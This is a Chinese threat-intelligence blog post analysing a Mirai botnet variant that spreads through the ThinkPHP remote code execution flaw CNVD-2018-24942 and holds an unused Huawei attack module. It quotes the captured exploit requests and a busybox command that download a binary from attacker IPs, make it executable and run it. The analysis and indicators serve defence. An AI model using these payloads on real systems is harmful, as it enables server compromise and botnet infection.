僵尸网络Mirai变种疑似开始针对华为进行武器制作

释放双眼,带上耳机,听听看~!

近日,发现有几个国外IP(77.40.109.35俄罗斯,188.17.77.196俄罗斯,5.140.140.23俄罗斯)对某客户内网多个ip进行了漏洞攻击尝试。通过流量分析确认攻击是是利用CNVD-2018-24942漏洞传播Mirai。此次发现的Mirari变种主要特点为只利用CNVD-2018-24942漏洞传播,且带有启针对华为设备做攻击的字符串,根据分析后推测可能是攻击者没有完工的半成品样本在做测试。

 

通过攻击流量分析,发现攻击IP使用了于2018年12月12日爆出的ThinkPHP远程代码执行漏洞(CNVD-2018-24942),攻击者利用该漏洞,可在未授权的情况下远程执行代码,下图为攻击流量截图:

攻击者试发送的payload如下:

‘GET/index.php?s=/index/.hink.pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=’wget http://107.172.41.235/NoIr_x.86 -O /tmp/NoIr_x.86; chmod 777 /tmp/NoIr_x.86;/tmp/NoIr_x.86 NoIr_x.86′ HTTP/1.1..Connection: keep-alive..Accept-Encoding:gzip, deflate..Accept: /..User-Agent: NoIr_x.86/2.0.

 ‘

GET /index.php?s=/index/.hink.pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=’wget http://85.117.234.116/NoIr_x.86 -O /tmp/NoIr_x.86; chmod 777 /tmp/NoIr_x.86;/tmp/NoIr_x.86 NoIr_x.86′ HTTP/1.1..Connection: keep-alive..Accept-Encoding:gzip, deflate..Accept: /..User-Agent: NoIr_x.86/2.0..

 

Payload如果执行成功的话,会下载http://107.172.41.235/NoIr_x.86或http://85.117.234.116/NoIr_x.86到tmp目录并修改lzrd权限为可执行,执行NoIr_x.86′

同时从威胁情报信息查询到http://107.172.41.235上面还存放了arm,mips,mipsl等不同cpu架构版本的病毒,如下图:

此病毒最早于5月26日被安全社区发现上传至共享网络。

目前85.117.234.116,107.172.41.235的http服务器都已经关闭,分析团队仅获取到了http://85.117.234.116/NoIr_x.86文件

 

此次的版本有如下特点:

 

1病毒结构非常简单。病毒的传播途径仅通过CNVD-2018-24942thinkphp远程执行漏洞,传播能力十分有限,如下图所示:

对比之前发现的mirari变种如下图所示:

可以发现以前版本的Mirari病毒往往会有利用弱口令和其他各种利于在快速传播的漏洞攻击模块。如果仅依靠thinkphp漏洞在公网传播,那么感染量将会比较小。

 

2.有未启用的代码模块。继续分析代码发现此病毒还有部分未启动的代码模块,如telnetscan:

此模块主要通过弱口令爆破telnet进行内网传播:

3.有未启用的针对华为设备的攻击模块:

分析后得到此模块大致流程如图:

其中对随机IP发送数据包部分,通过调试,得到数据包如下:

数据包的构造方式如下:

建立连接后,会发送如下命令

命令含义为去http://85.117.234.116上下载mips版本的病毒并把huwwei.selfreq(华为.自复制)作为参数执行,此服务器80端口已经关闭

 

 

基于以上三个特点,该变种暂时不具有较强的传播能力,推测可能是攻击者没有完工的半成品样本在做测试,同时攻击者可能会针对华为的设备做专门的攻击,不能确定攻击者是否借助近期的华为事件为目的,不排除攻击者完善代码后会发动新一轮攻击。

 

当然需要补充的是,此前Mirai还会使用华为的CVE-2017-17215进行攻击

使用该老漏洞的变种量也是极大

样本中利用华为攻击模块的截图

因此在阅读本文的时候需要和华为的老漏洞进行区分,因为此前并没有使用过如本次变种中涉及华为的代码。

$(/bin/busybox wget -g 85.117.234.116 -l /tmp/NoIr_M.ips -r /NoIr_M.ips
/bin/busybox chmod 777 * /tmp/NoIr_M.ips

/tmp/NoIr_M.ips huawei.selfrep)

此前checkpoint的分析

https://research.checkpoint.com/good-zero-day-skiddie/


此前的华为漏洞分析可见下文

https://www.freebuf.com/vuls/160040.html

值得一提的是,下面这篇在freebuf发布的文章可以和本文进行关联阅读。

利用Thinkphp漏洞传播的Mirari新变种分析

https://www.freebuf.com/articles/system/194157.html

变种MD5:498aa049cb0a8f5b119c0d2792e6f787

本文作者:来自Tod 安全工作室 K

技术交流请加作者个人微信:kfccfkhg


关于如何破坏Mirai的C2服务器的可以看看下面这篇文章


“ 恶人自有天收:如何能使僵尸网络Mirai的服务器宕机 ”

<上期看点>

微软再发通告:提醒你更新系统以防蠕虫病毒

Absolute公司防盗追踪软件到底存在什么安全问题

黑鸟威胁情报中心,只做最正确的情报,不传谣不信谣,欢迎扫码持续关注。

点击菜单栏,扫码加入每日更新的知识星球原价299,现价269

本文源自微信公众号:黑鸟

人已赞赏
安全工具

外国骗子装成中国黑客制造假0day漏洞视频,骗完钱后删号走人

2019-10-16 10:10:22

安全工具

猜猜我是哪个公开命名的APT组织,全猜对送你一个大花花哦!

2019-10-16 10:10:28

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索